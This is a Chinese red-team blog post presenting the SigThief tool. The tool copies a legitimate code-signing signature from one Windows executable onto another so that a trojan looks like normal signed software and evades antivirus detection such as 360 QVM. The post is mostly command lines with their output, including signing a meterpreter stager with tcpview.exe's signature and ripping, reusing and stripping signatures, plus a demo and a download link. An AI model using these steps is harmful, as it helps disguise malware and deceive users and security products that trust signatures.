【红队】SigThief 签名替换工具

免责声明

本公众号所提供的文字和信息仅供学习和研究使用，请读者自觉遵守法律法规，不得利用本公众号所提供的信息从事任何违法活动。本公众号不对读者的任何违法行为承担任何责任。工具来自网络，安全性自测，如有侵权请联系删除。

 

工具介绍

在攻防演练中，做完免杀马后为了效果更佳，我们一般需要把木马伪装成正常的文件，因此替换木马签名是很重要的步骤，且可以一定程度规避 360 的 qvm检测。

该工具，将会从已签名的 PE 文件中撕下签名并将其附加到另一个文件中，从而修复证书表以对该文件进行签名。

工具使用

从二进制文件中获取签名并将其添加到另一个二进制文件中

$ ./sigthief.py -i tcpview.exe -t x86_meterpreter_stager.exe -o /tmp/msftesting_tcpview.exe 
Output file: /tmp/msftesting_tcpview.exe
Signature appended. 
FIN.

将签名保存到磁盘以供以后使用

$ ./sigthief.py -i tcpview.exe -r                                                        
Ripping signature to file!
Output file: tcpview.exe_sig
Signature ripped. 
FIN.

使用撕破的签名

$ ./sigthief.py -s tcpview.exe_sig -t x86_meterpreter_stager.exe                               
Output file: x86_meterpreter_stager.exe_signed
Signature appended. 
FIN.

截断（删除）签名

实际上，这有非常有趣的结果，可以帮助您找到重视签名而不是代码功能的 AV。取消签署 putty.exe

 

$ ./sigthief.py -i tcpview.exe -T    
Inputfile is signed!
Output file: tcpview.exe_nosig
Overwriting certificate table pointer and truncating binary
Signature removed. 
FIN.

检查是否有签名（不检查有效性）

 

$ ./sigthief.py -i tcpview.exe -c
Inputfile is signed!

使用实例

免杀木马生成前文件

需要窃取的签名文件，我们这里使用sublime 用来演示。

接下来使用工具进行签名

-i 为签名文件
-t 为需要伪造的文件
-o 为输出文件

可以看到增加了数字签名

下载链接

https://github.com/secretsquirrel/SigThief

 

 

原文始发于微信公众号（贝雷帽SEC）：【红队】SigThief 签名替换工具